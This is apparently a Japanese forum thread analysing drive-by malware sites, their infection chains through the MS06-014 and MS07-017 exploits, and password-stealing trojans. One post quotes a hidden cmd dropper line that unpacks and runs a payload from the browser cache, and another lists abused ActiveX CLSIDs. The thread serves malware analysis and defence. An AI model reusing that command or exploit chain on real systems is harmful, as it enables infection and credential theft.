@ www■twurbbs■com/ A www■gamanir■com/614.htm B www■gamanir■com/072.html C www■gamanir■com/miansha.gif (EXPL_ANICMOO.GEN) D www■gamanir■com/2007mmm.exe (TSPY_MARAN.KX) ※括弧内はウイルスバスター(TrendMicro)でのウイルス名
@ → AB (IFRAME x 2個) A → D (VBScript MS06-014脆弱性利用) B → C → D (ANIカーソル MS07-017脆弱性利用)
このスレでも良く出てくるTSPY_MARAN.Dや、最近登場したTSPY_MARAN.KZなどを見ると、 マルウェア(DLL)がWinSock2のLSP(Layered Service Provider)として登録されて、 ブラウザを起動したときなどに、DLLが自動的に組み込まれ、パスワードなどを盗むようだ。
「.com」とか禁止ワードにしていたら新しい書き込みが 該当するページはソースチェッカーで見てみると赤文字で 「Page was deleted from this hosting」と書かれているだけで なんのリンクもないページのようでした aguesによるとロシア モスクワ ロシアは情報等に規制が厳しそう(イメージ)なので即効き消されたのかも?
BD96C556-65A3-11D0-983A-00C04FC29E36 RDS.DataSpace AB9BCEDD-EC7E-47E1-9322-D4A210617116 Business Object Factory 0006F033-0000-0000-C000-000000000046 Microsoft Outlook 8.0 Object Library 0006F03A-0000-0000-C000-000000000046 Microsoft Outlook 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 MUWebControl Class 6414512B-B978-451D-A0D8-FCFDF33E833C WUWebControl Class 7F5B7F63-F06F-4331-8A26-339E03C0AE3D WMI Object Broker 06723E09-F4C2-43c8-8358-09FCD1DB0766 VsmIDE.DTE 639F725F-1B2D-4831-A9FD-874847682010 DExplore.AppObj.8.0 BA018599-1DB3-44f9-83B4-461454C84BF8 VisualStudio.DTE.8.0 D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 Microsoft.DbgClr.DTE.8.0 E8CCCDDF-CA28-496b-B050-6C07C962476B VsaIDE.DTE
ani221[1].zipをテキストで開くと末尾に md /c for /D %a in (%TEMP%\..\tempor~1\Content.ie5\*) DO if EXIST %a\ied[1].txt expand %a\ied[1].txt \eied_s7_c_221ani.exe &\eied_s7_c_221ani.EXE &del \eied_s7_c_221ani.exe の記述(Javaで>>604氏の説明にあったwww2.p0rt2.comからダウンされたっぽい?)
Morphine(モルヒネ)はヨーロッパ(スロバキア?)のrootkit付属の暗号化プログラムで、 基本的には何らかのPackerと併用するようです(今回はUpackに使用)。 ライセンスがGNU GPLのオープソースとなっていてソースが公開されているため まともなアンチウイルスベンダなら復号できると思われます。 付属のドキュメントには以下のステキな文言が見られることから カスペには速攻で対応された模様。 Version 1.6 is about fucking KAV :). Well, not only fucking KAV, also second decrypting unit is before loader.
ちょっと面白かったもの。 リネージュ資料室さんの更新状況で見つけたこれ。 www■lovejpjp■com/gr/3he1.exe メモ帳(笑)でがーっと読むと、途中から何かおかしい。 「23niW rednu nur eb tsum margorp sihT」 これはWin32PEヘッダの 「This program must be run under Win32」 を逆転した物…というか「MZ」が「ZM」、「UPX」が「XPU」、 全バイトひっくり返ってる。これは暗号化と言っていいのか? すげぇ。ばかばかしいけど、すげぇ。 既知の www■lovejpjp■com/ceshi/ceshi.exe (このURIもひっくり返ってる)も拾って実行する、 ドロッパやトロイの詰め合わせのようです。 スルーしたNorton、McAfee、バスター、Avast!、AVGなどには提出済み。
ひっくり返っていない最初の方に見えるのはAvenger by NhT。 Google先生に聞いたらロシアのNhT-TeaMの物のようです。